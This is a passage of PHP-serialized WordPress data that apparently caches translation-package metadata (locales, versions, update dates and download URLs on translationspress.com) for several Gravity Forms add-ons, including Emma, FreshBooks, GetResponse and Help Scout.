(France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformsemma/gravityformsemma-fr_FR.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"fr\";}}s:2:\"de\";a:7:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:5:\"1.5.2\";s:7:\"updated\";s:25:\"2023-01-06T17:08:46+00:00\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformsemma/gravityformsemma-de_DE.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"de\";}}s:9:\"de/formal\";a:7:{s:8:\"language\";s:12:\"de_DE_formal\";s:7:\"version\";s:5:\"1.5.2\";s:7:\"updated\";s:25:\"2023-01-26T16:08:20+00:00\";s:12:\"english_name\";s:15:\"German (Formal)\";s:11:\"native_name\";s:13:\"Deutsch (Sie)\";s:7:\"package\";s:102:\"https://packages.translationspress.com/rocketgenius/gravityformsemma/gravityformsemma-de_DE_formal.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"de\";}}s:2:\"he\";a:7:{s:8:\"language\";s:5:\"he_IL\";s:7:\"version\";s:5:\"1.5.2\";s:7:\"updated\";s:25:\"2023-01-06T17:09:05+00:00\";s:12:\"english_name\";s:6:\"Hebrew\";s:11:\"native_name\";s:16:\"עִבְרִית\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformsemma/gravityformsemma-he_IL.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"he\";}}s:2:\"hi\";a:7:{s:8:\"language\";s:5:\"hi_IN\";s:7:\"version\";s:5:\"1.5.2\";s:7:\"updated\";s:25:\"2023-01-06T17:09:07+00:00\";s:12:\"english_name\";s:5:\"Hindi\";s:11:\"native_name\";s:18:\"हिन्दी\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformsemma/gravityformsemma-hi_IN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"hi\";i:1;s:3:\"hin\";}}s:2:\"it\";a:7:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:5:\"1.5.2\";s:7:\"updated\";s:25:\"2022-04-11T09:52:51+00:00\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformsemma/gravityformsemma-it_IT.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"it\";i:1;s:3:\"ita\";}}s:2:\"ja\";a:7:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:5:\"1.5.2\";s:7:\"updated\";s:25:\"2023-03-14T17:48:37+00:00\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:92:\"https://packages.translationspress.com/rocketgenius/gravityformsemma/gravityformsemma-ja.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"ja\";}}s:2:\"nb\";a:7:{s:8:\"language\";s:5:\"nb_NO\";s:7:\"version\";s:5:\"1.5.2\";s:7:\"updated\";s:25:\"2023-01-06T17:09:18+00:00\";s:12:\"english_name\";s:19:\"Norwegian (Bokmål)\";s:11:\"native_name\";s:13:\"Norsk bokmål\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformsemma/gravityformsemma-nb_NO.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nb\";i:1;s:3:\"nob\";}}s:2:\"pl\";a:7:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:5:\"1.5.2\";s:7:\"updated\";s:25:\"2021-09-14T09:31:53+00:00\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6:\"Polski\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformsemma/gravityformsemma-pl_PL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pl\";i:1;s:3:\"pol\";}}s:5:\"pt-br\";a:7:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:5:\"1.5.2\";s:7:\"updated\";s:25:\"2023-01-06T17:09:26+00:00\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do Brasil\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformsemma/gravityformsemma-pt_BR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pt\";i:1;s:3:\"por\";}}s:2:\"pt\";a:7:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:5:\"1.5.2\";s:7:\"updated\";s:25:\"2022-06-27T08:57:38+00:00\";s:12:\"english_name\";s:21:\"Portuguese (Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformsemma/gravityformsemma-pt_PT.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"pt\";}}s:2:\"ru\";a:7:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:5:\"1.5.2\";s:7:\"updated\";s:25:\"2023-01-06T17:09:31+00:00\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformsemma/gravityformsemma-ru_RU.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ru\";i:1;s:3:\"rus\";}}s:2:\"es\";a:7:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:5:\"1.5.2\";s:7:\"updated\";s:25:\"2023-01-06T17:08:54+00:00\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformsemma/gravityformsemma-es_ES.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"es\";i:1;s:3:\"spa\";i:2;s:3:\"spa\";}}s:2:\"sv\";a:7:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:5:\"1.5.2\";s:7:\"updated\";s:25:\"2023-01-06T17:09:35+00:00\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformsemma/gravityformsemma-sv_SE.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"sv\";i:1;s:3:\"swe\";}}s:2:\"tr\";a:7:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:5:\"1.5.2\";s:7:\"updated\";s:25:\"2023-01-06T17:09:37+00:00\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:95:\"https://packages.translationspress.com/rocketgenius/gravityformsemma/gravityformsemma-tr_TR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"tr\";i:1;s:3:\"tur\";}}s:2:\"uk\";a:7:{s:8:\"language\";s:2:\"uk\";s:7:\"version\";s:5:\"1.5.2\";s:7:\"updated\";s:25:\"2022-06-27T09:53:24+00:00\";s:12:\"english_name\";s:9:\"Ukrainian\";s:11:\"native_name\";s:20:\"Українська\";s:7:\"package\";s:92:\"https://packages.translationspress.com/rocketgenius/gravityformsemma/gravityformsemma-uk.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"uk\";i:1;s:3:\"ukr\";}}}}s:22:\"gravityformsfreshbooks\";a:1:{s:12:\"translations\";a:18:{s:2:\"da\";a:7:{s:8:\"language\";s:5:\"da_DK\";s:7:\"version\";s:3:\"2.8\";s:7:\"updated\";s:25:\"2023-01-06T17:09:49+00:00\";s:12:\"english_name\";s:6:\"Danish\";s:11:\"native_name\";s:5:\"Dansk\";s:7:\"package\";s:107:\"https://packages.translationspress.com/rocketgenius/gravityformsfreshbooks/gravityformsfreshbooks-da_DK.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"da\";i:1;s:3:\"dan\";}}s:2:\"nl\";a:7:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:3:\"2.8\";s:7:\"updated\";s:25:\"2023-01-06T17:10:29+00:00\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:107:\"https://packages.translationspress.com/rocketgenius/gravityformsfreshbooks/gravityformsfreshbooks-nl_NL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nl\";i:1;s:3:\"nld\";}}s:5:\"en-au\";a:7:{s:8:\"language\";s:5:\"en_AU\";s:7:\"version\";s:3:\"2.8\";s:7:\"updated\";s:25:\"2022-06-27T08:34:12+00:00\";s:12:\"english_name\";s:19:\"English (Australia)\";s:11:\"native_name\";s:19:\"English (Australia)\";s:7:\"package\";s:107:\"https://packages.translationspress.com/rocketgenius/gravityformsfreshbooks/gravityformsfreshbooks-en_AU.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:5:\"en-gb\";a:7:{s:8:\"language\";s:5:\"en_GB\";s:7:\"version\";s:3:\"2.8\";s:7:\"updated\";s:25:\"2022-03-15T13:30:45+00:00\";s:12:\"english_name\";s:12:\"English (UK)\";s:11:\"native_name\";s:12:\"English (UK)\";s:7:\"package\";s:107:\"https://packages.translationspress.com/rocketgenius/gravityformsfreshbooks/gravityformsfreshbooks-en_GB.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:2:\"fi\";a:7:{s:8:\"language\";s:2:\"fi\";s:7:\"version\";s:3:\"2.8\";s:7:\"updated\";s:25:\"2023-02-20T14:36:42+00:00\";s:12:\"english_name\";s:7:\"Finnish\";s:11:\"native_name\";s:5:\"Suomi\";s:7:\"package\";s:104:\"https://packages.translationspress.com/rocketgenius/gravityformsfreshbooks/gravityformsfreshbooks-fi.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fi\";i:1;s:3:\"fin\";}}s:2:\"fr\";a:7:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:3:\"2.8\";s:7:\"updated\";s:25:\"2020-10-21T11:51:43+00:00\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:107:\"https://packages.translationspress.com/rocketgenius/gravityformsfreshbooks/gravityformsfreshbooks-fr_FR.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"fr\";}}s:2:\"de\";a:7:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:3:\"2.8\";s:7:\"updated\";s:25:\"2023-01-06T17:09:52+00:00\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:107:\"https://packages.translationspress.com/rocketgenius/gravityformsfreshbooks/gravityformsfreshbooks-de_DE.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"de\";}}s:2:\"he\";a:7:{s:8:\"language\";s:5:\"he_IL\";s:7:\"version\";s:3:\"2.8\";s:7:\"updated\";s:25:\"2023-01-06T17:10:11+00:00\";s:12:\"english_name\";s:6:\"Hebrew\";s:11:\"native_name\";s:16:\"עִבְרִית\";s:7:\"package\";s:107:\"https://packages.translationspress.com/rocketgenius/gravityformsfreshbooks/gravityformsfreshbooks-he_IL.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"he\";}}s:2:\"hi\";a:7:{s:8:\"language\";s:5:\"hi_IN\";s:7:\"version\";s:3:\"2.8\";s:7:\"updated\";s:25:\"2023-01-06T17:10:13+00:00\";s:12:\"english_name\";s:5:\"Hindi\";s:11:\"native_name\";s:18:\"हिन्दी\";s:7:\"package\";s:107:\"https://packages.translationspress.com/rocketgenius/gravityformsfreshbooks/gravityformsfreshbooks-hi_IN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"hi\";i:1;s:3:\"hin\";}}s:2:\"it\";a:7:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:3:\"2.8\";s:7:\"updated\";s:25:\"2023-01-06T17:10:19+00:00\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:107:\"https://packages.translationspress.com/rocketgenius/gravityformsfreshbooks/gravityformsfreshbooks-it_IT.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"it\";i:1;s:3:\"ita\";}}s:2:\"ja\";a:7:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:3:\"2.8\";s:7:\"updated\";s:25:\"2023-03-14T17:49:01+00:00\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:104:\"https://packages.translationspress.com/rocketgenius/gravityformsfreshbooks/gravityformsfreshbooks-ja.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"ja\";}}s:2:\"pl\";a:7:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:3:\"2.8\";s:7:\"updated\";s:25:\"2021-09-14T09:32:44+00:00\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6:\"Polski\";s:7:\"package\";s:107:\"https://packages.translationspress.com/rocketgenius/gravityformsfreshbooks/gravityformsfreshbooks-pl_PL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pl\";i:1;s:3:\"pol\";}}s:5:\"pt-br\";a:7:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:3:\"2.8\";s:7:\"updated\";s:25:\"2023-01-06T17:10:33+00:00\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do Brasil\";s:7:\"package\";s:107:\"https://packages.translationspress.com/rocketgenius/gravityformsfreshbooks/gravityformsfreshbooks-pt_BR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pt\";i:1;s:3:\"por\";}}s:2:\"pt\";a:7:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:3:\"2.8\";s:7:\"updated\";s:25:\"2020-12-17T15:53:03+00:00\";s:12:\"english_name\";s:21:\"Portuguese (Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:107:\"https://packages.translationspress.com/rocketgenius/gravityformsfreshbooks/gravityformsfreshbooks-pt_PT.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"pt\";}}s:2:\"ru\";a:7:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:3:\"2.8\";s:7:\"updated\";s:25:\"2023-01-06T17:10:39+00:00\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:107:\"https://packages.translationspress.com/rocketgenius/gravityformsfreshbooks/gravityformsfreshbooks-ru_RU.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ru\";i:1;s:3:\"rus\";}}s:2:\"es\";a:7:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:3:\"2.8\";s:7:\"updated\";s:25:\"2023-01-06T17:09:59+00:00\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:107:\"https://packages.translationspress.com/rocketgenius/gravityformsfreshbooks/gravityformsfreshbooks-es_ES.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"es\";i:1;s:3:\"spa\";i:2;s:3:\"spa\";}}s:2:\"sv\";a:7:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:3:\"2.8\";s:7:\"updated\";s:25:\"2021-02-08T11:26:17+00:00\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:107:\"https://packages.translationspress.com/rocketgenius/gravityformsfreshbooks/gravityformsfreshbooks-sv_SE.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"sv\";i:1;s:3:\"swe\";}}s:2:\"tr\";a:7:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:3:\"2.8\";s:7:\"updated\";s:25:\"2023-01-06T17:10:44+00:00\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:107:\"https://packages.translationspress.com/rocketgenius/gravityformsfreshbooks/gravityformsfreshbooks-tr_TR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"tr\";i:1;s:3:\"tur\";}}}}s:23:\"gravityformsgetresponse\";a:1:{s:12:\"translations\";a:19:{s:2:\"da\";a:7:{s:8:\"language\";s:5:\"da_DK\";s:7:\"version\";s:5:\"1.7.1\";s:7:\"updated\";s:25:\"2023-01-06T17:10:57+00:00\";s:12:\"english_name\";s:6:\"Danish\";s:11:\"native_name\";s:5:\"Dansk\";s:7:\"package\";s:109:\"https://packages.translationspress.com/rocketgenius/gravityformsgetresponse/gravityformsgetresponse-da_DK.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"da\";i:1;s:3:\"dan\";}}s:2:\"nl\";a:7:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:5:\"1.7.1\";s:7:\"updated\";s:25:\"2020-11-04T17:36:04+00:00\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:109:\"https://packages.translationspress.com/rocketgenius/gravityformsgetresponse/gravityformsgetresponse-nl_NL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nl\";i:1;s:3:\"nld\";}}s:5:\"en-au\";a:7:{s:8:\"language\";s:5:\"en_AU\";s:7:\"version\";s:5:\"1.7.1\";s:7:\"updated\";s:25:\"2022-06-27T08:58:09+00:00\";s:12:\"english_name\";s:19:\"English (Australia)\";s:11:\"native_name\";s:19:\"English (Australia)\";s:7:\"package\";s:109:\"https://packages.translationspress.com/rocketgenius/gravityformsgetresponse/gravityformsgetresponse-en_AU.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:5:\"en-gb\";a:7:{s:8:\"language\";s:5:\"en_GB\";s:7:\"version\";s:5:\"1.7.1\";s:7:\"updated\";s:25:\"2022-06-27T08:58:11+00:00\";s:12:\"english_name\";s:12:\"English (UK)\";s:11:\"native_name\";s:12:\"English (UK)\";s:7:\"package\";s:109:\"https://packages.translationspress.com/rocketgenius/gravityformsgetresponse/gravityformsgetresponse-en_GB.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:2:\"fi\";a:7:{s:8:\"language\";s:2:\"fi\";s:7:\"version\";s:5:\"1.7.1\";s:7:\"updated\";s:25:\"2023-01-06T17:11:13+00:00\";s:12:\"english_name\";s:7:\"Finnish\";s:11:\"native_name\";s:5:\"Suomi\";s:7:\"package\";s:106:\"https://packages.translationspress.com/rocketgenius/gravityformsgetresponse/gravityformsgetresponse-fi.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fi\";i:1;s:3:\"fin\";}}s:2:\"fr\";a:7:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:5:\"1.7.1\";s:7:\"updated\";s:25:\"2023-01-06T17:11:16+00:00\";s:12:\"english_name\";s:15:\"French (France)\";s:11:\"native_name\";s:9:\"Français\";s:7:\"package\";s:109:\"https://packages.translationspress.com/rocketgenius/gravityformsgetresponse/gravityformsgetresponse-fr_FR.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"fr\";}}s:2:\"de\";a:7:{s:8:\"language\";s:5:\"de_DE\";s:7:\"version\";s:5:\"1.7.1\";s:7:\"updated\";s:25:\"2020-11-04T17:34:56+00:00\";s:12:\"english_name\";s:6:\"German\";s:11:\"native_name\";s:7:\"Deutsch\";s:7:\"package\";s:109:\"https://packages.translationspress.com/rocketgenius/gravityformsgetresponse/gravityformsgetresponse-de_DE.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"de\";}}s:2:\"he\";a:7:{s:8:\"language\";s:5:\"he_IL\";s:7:\"version\";s:5:\"1.7.1\";s:7:\"updated\";s:25:\"2023-01-06T17:11:18+00:00\";s:12:\"english_name\";s:6:\"Hebrew\";s:11:\"native_name\";s:16:\"עִבְרִית\";s:7:\"package\";s:109:\"https://packages.translationspress.com/rocketgenius/gravityformsgetresponse/gravityformsgetresponse-he_IL.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"he\";}}s:2:\"hi\";a:7:{s:8:\"language\";s:5:\"hi_IN\";s:7:\"version\";s:5:\"1.7.1\";s:7:\"updated\";s:25:\"2020-11-04T17:34:11+00:00\";s:12:\"english_name\";s:5:\"Hindi\";s:11:\"native_name\";s:18:\"हिन्दी\";s:7:\"package\";s:109:\"https://packages.translationspress.com/rocketgenius/gravityformsgetresponse/gravityformsgetresponse-hi_IN.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"hi\";i:1;s:3:\"hin\";}}s:2:\"it\";a:7:{s:8:\"language\";s:5:\"it_IT\";s:7:\"version\";s:5:\"1.7.1\";s:7:\"updated\";s:25:\"2023-01-06T17:11:25+00:00\";s:12:\"english_name\";s:7:\"Italian\";s:11:\"native_name\";s:8:\"Italiano\";s:7:\"package\";s:109:\"https://packages.translationspress.com/rocketgenius/gravityformsgetresponse/gravityformsgetresponse-it_IT.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"it\";i:1;s:3:\"ita\";}}s:2:\"ja\";a:7:{s:8:\"language\";s:2:\"ja\";s:7:\"version\";s:5:\"1.7.1\";s:7:\"updated\";s:25:\"2023-03-14T17:49:50+00:00\";s:12:\"english_name\";s:8:\"Japanese\";s:11:\"native_name\";s:9:\"日本語\";s:7:\"package\";s:106:\"https://packages.translationspress.com/rocketgenius/gravityformsgetresponse/gravityformsgetresponse-ja.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"ja\";}}s:2:\"pl\";a:7:{s:8:\"language\";s:5:\"pl_PL\";s:7:\"version\";s:5:\"1.7.1\";s:7:\"updated\";s:25:\"2023-01-06T17:11:39+00:00\";s:12:\"english_name\";s:6:\"Polish\";s:11:\"native_name\";s:6:\"Polski\";s:7:\"package\";s:109:\"https://packages.translationspress.com/rocketgenius/gravityformsgetresponse/gravityformsgetresponse-pl_PL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pl\";i:1;s:3:\"pol\";}}s:5:\"pt-br\";a:7:{s:8:\"language\";s:5:\"pt_BR\";s:7:\"version\";s:5:\"1.7.1\";s:7:\"updated\";s:25:\"2023-01-06T17:11:41+00:00\";s:12:\"english_name\";s:19:\"Portuguese (Brazil)\";s:11:\"native_name\";s:20:\"Português do Brasil\";s:7:\"package\";s:109:\"https://packages.translationspress.com/rocketgenius/gravityformsgetresponse/gravityformsgetresponse-pt_BR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"pt\";i:1;s:3:\"por\";}}s:2:\"pt\";a:7:{s:8:\"language\";s:5:\"pt_PT\";s:7:\"version\";s:5:\"1.7.1\";s:7:\"updated\";s:25:\"2023-01-06T17:11:42+00:00\";s:12:\"english_name\";s:21:\"Portuguese (Portugal)\";s:11:\"native_name\";s:10:\"Português\";s:7:\"package\";s:109:\"https://packages.translationspress.com/rocketgenius/gravityformsgetresponse/gravityformsgetresponse-pt_PT.zip\";s:3:\"iso\";a:1:{i:0;s:2:\"pt\";}}s:2:\"ru\";a:7:{s:8:\"language\";s:5:\"ru_RU\";s:7:\"version\";s:5:\"1.7.1\";s:7:\"updated\";s:25:\"2020-11-04T17:35:18+00:00\";s:12:\"english_name\";s:7:\"Russian\";s:11:\"native_name\";s:14:\"Русский\";s:7:\"package\";s:109:\"https://packages.translationspress.com/rocketgenius/gravityformsgetresponse/gravityformsgetresponse-ru_RU.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ru\";i:1;s:3:\"rus\";}}s:2:\"es\";a:7:{s:8:\"language\";s:5:\"es_ES\";s:7:\"version\";s:5:\"1.7.1\";s:7:\"updated\";s:25:\"2023-01-06T17:11:09+00:00\";s:12:\"english_name\";s:15:\"Spanish (Spain)\";s:11:\"native_name\";s:8:\"Español\";s:7:\"package\";s:109:\"https://packages.translationspress.com/rocketgenius/gravityformsgetresponse/gravityformsgetresponse-es_ES.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"es\";i:1;s:3:\"spa\";i:2;s:3:\"spa\";}}s:2:\"sv\";a:7:{s:8:\"language\";s:5:\"sv_SE\";s:7:\"version\";s:5:\"1.7.1\";s:7:\"updated\";s:25:\"2021-02-08T11:28:42+00:00\";s:12:\"english_name\";s:7:\"Swedish\";s:11:\"native_name\";s:7:\"Svenska\";s:7:\"package\";s:109:\"https://packages.translationspress.com/rocketgenius/gravityformsgetresponse/gravityformsgetresponse-sv_SE.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"sv\";i:1;s:3:\"swe\";}}s:2:\"tr\";a:7:{s:8:\"language\";s:5:\"tr_TR\";s:7:\"version\";s:5:\"1.7.1\";s:7:\"updated\";s:25:\"2023-01-06T17:11:52+00:00\";s:12:\"english_name\";s:7:\"Turkish\";s:11:\"native_name\";s:8:\"Türkçe\";s:7:\"package\";s:109:\"https://packages.translationspress.com/rocketgenius/gravityformsgetresponse/gravityformsgetresponse-tr_TR.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"tr\";i:1;s:3:\"tur\";}}s:2:\"uk\";a:7:{s:8:\"language\";s:2:\"uk\";s:7:\"version\";s:5:\"1.7.1\";s:7:\"updated\";s:25:\"2022-06-27T09:53:24+00:00\";s:12:\"english_name\";s:9:\"Ukrainian\";s:11:\"native_name\";s:20:\"Українська\";s:7:\"package\";s:106:\"https://packages.translationspress.com/rocketgenius/gravityformsgetresponse/gravityformsgetresponse-uk.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"uk\";i:1;s:3:\"ukr\";}}}}s:21:\"gravityformshelpscout\";a:1:{s:12:\"translations\";a:19:{s:2:\"ca\";a:7:{s:8:\"language\";s:2:\"ca\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2022-06-27T09:58:27+00:00\";s:12:\"english_name\";s:7:\"Catalan\";s:11:\"native_name\";s:7:\"Català\";s:7:\"package\";s:102:\"https://packages.translationspress.com/rocketgenius/gravityformshelpscout/gravityformshelpscout-ca.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"ca\";i:1;s:3:\"cat\";}}s:2:\"da\";a:7:{s:8:\"language\";s:5:\"da_DK\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2022-06-27T09:58:31+00:00\";s:12:\"english_name\";s:6:\"Danish\";s:11:\"native_name\";s:5:\"Dansk\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformshelpscout/gravityformshelpscout-da_DK.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"da\";i:1;s:3:\"dan\";}}s:2:\"nl\";a:7:{s:8:\"language\";s:5:\"nl_NL\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2021-10-11T17:38:30+00:00\";s:12:\"english_name\";s:5:\"Dutch\";s:11:\"native_name\";s:10:\"Nederlands\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformshelpscout/gravityformshelpscout-nl_NL.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"nl\";i:1;s:3:\"nld\";}}s:5:\"en-au\";a:7:{s:8:\"language\";s:5:\"en_AU\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2022-06-27T09:58:40+00:00\";s:12:\"english_name\";s:19:\"English (Australia)\";s:11:\"native_name\";s:19:\"English (Australia)\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformshelpscout/gravityformshelpscout-en_AU.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:5:\"en-gb\";a:7:{s:8:\"language\";s:5:\"en_GB\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2022-06-27T09:58:42+00:00\";s:12:\"english_name\";s:12:\"English (UK)\";s:11:\"native_name\";s:12:\"English (UK)\";s:7:\"package\";s:105:\"https://packages.translationspress.com/rocketgenius/gravityformshelpscout/gravityformshelpscout-en_GB.zip\";s:3:\"iso\";a:3:{i:0;s:2:\"en\";i:1;s:3:\"eng\";i:2;s:3:\"eng\";}}s:2:\"fi\";a:7:{s:8:\"language\";s:2:\"fi\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2023-01-06T17:12:19+00:00\";s:12:\"english_name\";s:7:\"Finnish\";s:11:\"native_name\";s:5:\"Suomi\";s:7:\"package\";s:102:\"https://packages.translationspress.com/rocketgenius/gravityformshelpscout/gravityformshelpscout-fi.zip\";s:3:\"iso\";a:2:{i:0;s:2:\"fi\";i:1;s:3:\"fin\";}}s:2:\"fr\";a:7:{s:8:\"language\";s:5:\"fr_FR\";s:7:\"version\";s:5:\"2.0.1\";s:7:\"updated\";s:25:\"2021-10-25T16:20:17+00:00\";s:12:\"english_name\";s:15:\"French 